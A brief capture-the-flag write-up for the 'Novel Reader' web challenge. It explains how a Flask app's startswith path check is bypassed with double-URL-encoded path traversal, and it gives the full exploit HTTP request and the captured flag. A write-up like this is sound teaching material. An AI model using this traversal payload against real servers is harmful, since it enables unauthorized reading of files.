Novel Reader

Web Challenge

The funny thing is I managed to solve Novel Reader 2 first instead of 1 because I couldn't find where the first flag file was located. First, I opened the docker environment to understand the program's source code. It's a web application built using the Flask framework in Python.

look at the file structure at the right hand sight

And the most important thing... the flag.txt I couldn't find it until the very last minute when I discovered it was in the root folder.

So, how do you read it? Well, there is a read function that you can bypass from this code block.

notice the startswith condition

How so? By using the double URL encoding method from ../../ to %252e%252e%252f%252e%252e%252fflag.txt

GET /api/read/public/%252e%252e%252f%252e%252e%252fflag.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US, en
Connection: keep-alive
Cookie: session=eyJjcmVkaXQiOjEwMCwid29yZHNfYmFsYW5jZSI6MX0.Za000Q.zcBtJvYM3vXoJBf_o6j8gd_g9n4
Host: 3.64.250.135:9000
Referer: http://3.64.250.135:9000/
Sec-GPC: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest

MAPNA{uhhh-1-7h1nk-1-f0r607-70-ch3ck-cr3d17>0-4b331d4b}

PreviousTamperedNextNovel Reader 2

Last updated